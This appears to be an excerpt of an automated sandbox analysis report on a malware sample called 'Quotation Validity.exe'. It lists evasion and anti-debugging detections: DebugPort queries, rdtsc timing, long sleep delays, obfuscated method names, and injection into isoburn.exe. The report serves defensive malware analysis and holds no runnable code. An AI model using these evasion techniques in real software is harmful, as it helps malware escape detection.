                      Source: 2.2.Quotation Validity.exe.44324c8.1.raw.unpack, FZaOUuOPvnEAfIAr0M.csHigh entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
                      Source: 2.2.Quotation Validity.exe.44324c8.1.raw.unpack, GtaAIbrHXObmMm8GPA.csHigh entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
                      Source: 2.2.Quotation Validity.exe.44324c8.1.raw.unpack, kAOj1Y7pfP90kycNNw.csHigh entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match, File source: Process Memory Space: Quotation Validity.exe PID: 7488, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\isoburn.exe, API/Special instruction interceptor: Address: 7FF8418CD324
                      Source: C:\Users\user\Desktop\Quotation Validity.exe, Memory allocated: 1820000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Quotation Validity.exe, Code function: 9_2_013ED1C0 rdtsc 9_2_013ED1C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exe, Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\isoburn.exe, Window / User API: threadDelayed 1792
                      Source: C:\Windows\SysWOW64\isoburn.exe, Window / User API: threadDelayed 8181
                      Source: C:\Users\user\Desktop\Quotation Validity.exe, API coverage: 0.8 %
                      Source: C:\Windows\SysWOW64\isoburn.exe, API coverage: 2.9 %
                      Source: C:\Users\user\Desktop\Quotation Validity.exe TID: 7528, Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\isoburn.exe TID: 744, Thread sleep count: 1792 > 30
                      Source: C:\Windows\SysWOW64\isoburn.exe TID: 744, Thread sleep time: -3584000s >= -30000s
                      Source: C:\Windows\SysWOW64\isoburn.exe TID: 744, Thread sleep count: 8181 > 30
                      Source: C:\Windows\SysWOW64\isoburn.exe TID: 744, Thread sleep time: -16362000s >= -30000s
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe TID: 5968, Thread sleep time: -60000s >= -30000s
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe TID: 5968, Thread sleep time: -49500s >= -30000s
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe TID: 5968, Thread sleep time: -35000s >= -30000s
                      Source: C:\Windows\SysWOW64\isoburn.exe, Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 12_2_02A5C4E0 FindFirstFileW,FindNextFileW,FindClose,12_2_02A5C4E0
                      Source: l420377x.12.dr, Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                      Source: C:\Users\user\Desktop\Quotation Validity.exe, Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\Quotation Validity.exe, Process queried: DebugPort
                      Source: C:\Windows\SysWOW64\isoburn.exe, Process queried: DebugPort
                      Source: C:\Users\user\Desktop\Quotation Validity.exe, Code function: 9_2_00417723 LdrLoadDll,9_2_00417723
                      Source: C:\Users\user\Desktop\Quotation Validity.exe, Code function: 9_2_0136B136 mov eax, dword ptr fs:[00000030h] 9_2_0136B136
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01375096 mov eax, dword ptr fs:[00000030h]9_2_01375096
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A909C mov eax, dword ptr fs:[00000030h]9_2_013A909C
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139D090 mov eax, dword ptr fs:[00000030h]9_2_0139D090
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139D090 mov eax, dword ptr fs:[00000030h]9_2_0139D090
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136D08D mov eax, dword ptr fs:[00000030h]9_2_0136D08D
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137208A mov eax, dword ptr fs:[00000030h]9_2_0137208A
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136C0F0 mov eax, dword ptr fs:[00000030h]9_2_0136C0F0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B20F0 mov ecx, dword ptr fs:[00000030h]9_2_013B20F0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136A0E3 mov ecx, dword ptr fs:[00000030h]9_2_0136A0E3
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013950E4 mov eax, dword ptr fs:[00000030h]9_2_013950E4
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013950E4 mov ecx, dword ptr fs:[00000030h]9_2_013950E4
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013780E9 mov eax, dword ptr fs:[00000030h]9_2_013780E9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F60E0 mov eax, dword ptr fs:[00000030h]9_2_013F60E0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F20DE mov eax, dword ptr fs:[00000030h]9_2_013F20DE
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013990DB mov eax, dword ptr fs:[00000030h]9_2_013990DB
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov ecx, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov ecx, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov ecx, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov ecx, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014360B8 mov eax, dword ptr fs:[00000030h]9_2_014360B8
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014360B8 mov ecx, dword ptr fs:[00000030h]9_2_014360B8
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013ED0C0 mov eax, dword ptr fs:[00000030h]9_2_013ED0C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013ED0C0 mov eax, dword ptr fs:[00000030h]9_2_013ED0C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01445341 mov eax, dword ptr fs:[00000030h]9_2_01445341
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01367330 mov eax, dword ptr fs:[00000030h]9_2_01367330
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0143A352 mov eax, dword ptr fs:[00000030h]9_2_0143A352
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139F32A mov eax, dword ptr fs:[00000030h]9_2_0139F32A
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0142F367 mov eax, dword ptr fs:[00000030h]9_2_0142F367
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136C310 mov ecx, dword ptr fs:[00000030h]9_2_0136C310
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01390310 mov ecx, dword ptr fs:[00000030h]9_2_01390310
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AA30B mov eax, dword ptr fs:[00000030h]9_2_013AA30B
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AA30B mov eax, dword ptr fs:[00000030h]9_2_013AA30B
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AA30B mov eax, dword ptr fs:[00000030h]9_2_013AA30B
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F930B mov eax, dword ptr fs:[00000030h]9_2_013F930B
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F930B mov eax, dword ptr fs:[00000030h]9_2_013F930B
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F930B mov eax, dword ptr fs:[00000030h]9_2_013F930B
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0141437C mov eax, dword ptr fs:[00000030h]9_2_0141437C
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01377370 mov eax, dword ptr fs:[00000030h]9_2_01377370
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01377370 mov eax, dword ptr fs:[00000030h]9_2_01377370
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01377370 mov eax, dword ptr fs:[00000030h]9_2_01377370
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F035C mov eax, dword ptr fs:[00000030h]9_2_013F035C
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F035C mov eax, dword ptr fs:[00000030h]9_2_013F035C
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F035C mov eax, dword ptr fs:[00000030h]9_2_013F035C
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F035C mov ecx, dword ptr fs:[00000030h]9_2_013F035C
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F035C mov eax, dword ptr fs:[00000030h]9_2_013F035C
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F035C mov eax, dword ptr fs:[00000030h]9_2_013F035C
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01369353 mov eax, dword ptr fs:[00000030h]9_2_01369353
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01369353 mov eax, dword ptr fs:[00000030h]9_2_01369353
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0143132D mov eax, dword ptr fs:[00000030h]9_2_0143132D
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0143132D mov eax, dword ptr fs:[00000030h]9_2_0143132D
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136D34C mov eax, dword ptr fs:[00000030h]9_2_0136D34C
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136D34C mov eax, dword ptr fs:[00000030h]9_2_0136D34C
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0142C3CD mov eax, dword ptr fs:[00000030h]9_2_0142C3CD
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0142B3D0 mov ecx, dword ptr fs:[00000030h]9_2_0142B3D0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A33A0 mov eax, dword ptr fs:[00000030h]9_2_013A33A0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A33A0 mov eax, dword ptr fs:[00000030h]9_2_013A33A0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013933A5 mov eax, dword ptr fs:[00000030h]9_2_013933A5
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01368397 mov eax, dword ptr fs:[00000030h]9_2_01368397
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01368397 mov eax, dword ptr fs:[00000030h]9_2_01368397
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01368397 mov eax, dword ptr fs:[00000030h]9_2_01368397
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0142F3E6 mov eax, dword ptr fs:[00000030h]9_2_0142F3E6
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013C739A mov eax, dword ptr fs:[00000030h]9_2_013C739A
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013C739A mov eax, dword ptr fs:[00000030h]9_2_013C739A
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139438F mov eax, dword ptr fs:[00000030h]9_2_0139438F
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139438F mov eax, dword ptr fs:[00000030h]9_2_0139438F
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014453FC mov eax, dword ptr fs:[00000030h]9_2_014453FC
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136E388 mov eax, dword ptr fs:[00000030h]9_2_0136E388
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136E388 mov eax, dword ptr fs:[00000030h]9_2_0136E388
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136E388 mov eax, dword ptr fs:[00000030h]9_2_0136E388
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A63FF mov eax, dword ptr fs:[00000030h]9_2_013A63FF
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0138E3F0 mov eax, dword ptr fs:[00000030h]9_2_0138E3F0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0138E3F0 mov eax, dword ptr fs:[00000030h]9_2_0138E3F0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0138E3F0 mov eax, dword ptr fs:[00000030h]9_2_0138E3F0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013803E9 mov eax, dword ptr fs:[00000030h]9_2_013803E9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013803E9 mov eax, dword ptr fs:[00000030h]9_2_013803E9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013803E9 mov eax, dword ptr fs:[00000030h]9_2_013803E9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013803E9 mov eax, dword ptr fs:[00000030h]9_2_013803E9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013803E9 mov eax, dword ptr fs:[00000030h]9_2_013803E9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013803E9 mov eax, dword ptr fs:[00000030h]9_2_013803E9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013803E9 mov eax, dword ptr fs:[00000030h]9_2_013803E9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013803E9 mov eax, dword ptr fs:[00000030h]9_2_013803E9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0144539D mov eax, dword ptr fs:[00000030h]9_2_0144539D
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137A3C0 mov eax, dword ptr fs:[00000030h]9_2_0137A3C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137A3C0 mov eax, dword ptr fs:[00000030h]9_2_0137A3C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137A3C0 mov eax, dword ptr fs:[00000030h]9_2_0137A3C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137A3C0 mov eax, dword ptr fs:[00000030h]9_2_0137A3C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137A3C0 mov eax, dword ptr fs:[00000030h]9_2_0137A3C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137A3C0 mov eax, dword ptr fs:[00000030h]9_2_0137A3C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013783C0 mov eax, dword ptr fs:[00000030h]9_2_013783C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013783C0 mov eax, dword ptr fs:[00000030h]9_2_013783C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013783C0 mov eax, dword ptr fs:[00000030h]9_2_013783C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013783C0 mov eax, dword ptr fs:[00000030h]9_2_013783C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136823B mov eax, dword ptr fs:[00000030h]9_2_0136823B
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0142B256 mov eax, dword ptr fs:[00000030h]9_2_0142B256
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0142B256 mov eax, dword ptr fs:[00000030h]9_2_0142B256
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0143D26B mov eax, dword ptr fs:[00000030h]9_2_0143D26B
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0143D26B mov eax, dword ptr fs:[00000030h]9_2_0143D26B
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A7208 mov eax, dword ptr fs:[00000030h]9_2_013A7208
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A7208 mov eax, dword ptr fs:[00000030h]9_2_013A7208
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01420274 mov eax, dword ptr fs:[00000030h]9_2_01420274
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01420274 mov eax, dword ptr fs:[00000030h]9_2_01420274
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01420274 mov eax, dword ptr fs:[00000030h]9_2_01420274
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01420274 mov eax, dword ptr fs:[00000030h]9_2_01420274
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01420274 mov eax, dword ptr fs:[00000030h]9_2_01420274
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01420274 mov eax, dword ptr fs:[00000030h]9_2_01420274
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01420274 mov eax, dword ptr fs:[00000030h]9_2_01420274
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01420274 mov eax, dword ptr fs:[00000030h]9_2_01420274
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01420274 mov eax, dword ptr fs:[00000030h]9_2_01420274
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01420274 mov eax, dword ptr fs:[00000030h]9_2_01420274
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01420274 mov eax, dword ptr fs:[00000030h]9_2_01420274
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01420274 mov eax, dword ptr fs:[00000030h]9_2_01420274
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B1270 mov eax, dword ptr fs:[00000030h]9_2_013B1270
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B1270 mov eax, dword ptr fs:[00000030h]9_2_013B1270
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01399274 mov eax, dword ptr fs:[00000030h]9_2_01399274
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01374260 mov eax, dword ptr fs:[00000030h]9_2_01374260
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01374260 mov eax, dword ptr fs:[00000030h]9_2_01374260
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01374260 mov eax, dword ptr fs:[00000030h]9_2_01374260
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136826B mov eax, dword ptr fs:[00000030h]9_2_0136826B
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01445227 mov eax, dword ptr fs:[00000030h]9_2_01445227
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136A250 mov eax, dword ptr fs:[00000030h]9_2_0136A250
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01376259 mov eax, dword ptr fs:[00000030h]9_2_01376259
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01369240 mov eax, dword ptr fs:[00000030h]9_2_01369240
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01369240 mov eax, dword ptr fs:[00000030h]9_2_01369240
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A724D mov eax, dword ptr fs:[00000030h]9_2_013A724D
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F92BC mov eax, dword ptr fs:[00000030h]9_2_013F92BC
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F92BC mov eax, dword ptr fs:[00000030h]9_2_013F92BC
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F92BC mov ecx, dword ptr fs:[00000030h]9_2_013F92BC
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F92BC mov ecx, dword ptr fs:[00000030h]9_2_013F92BC
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013802A0 mov eax, dword ptr fs:[00000030h]9_2_013802A0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013802A0 mov eax, dword ptr fs:[00000030h]9_2_013802A0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013852A0 mov eax, dword ptr fs:[00000030h]9_2_013852A0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013852A0 mov eax, dword ptr fs:[00000030h]9_2_013852A0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013852A0 mov eax, dword ptr fs:[00000030h]9_2_013852A0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013852A0 mov eax, dword ptr fs:[00000030h]9_2_013852A0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A329E mov eax, dword ptr fs:[00000030h]9_2_013A329E
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A329E mov eax, dword ptr fs:[00000030h]9_2_013A329E
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014452E2 mov eax, dword ptr fs:[00000030h]9_2_014452E2
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0142F2F8 mov eax, dword ptr fs:[00000030h]9_2_0142F2F8
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F0283 mov eax, dword ptr fs:[00000030h]9_2_013F0283
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F0283 mov eax, dword ptr fs:[00000030h]9_2_013F0283
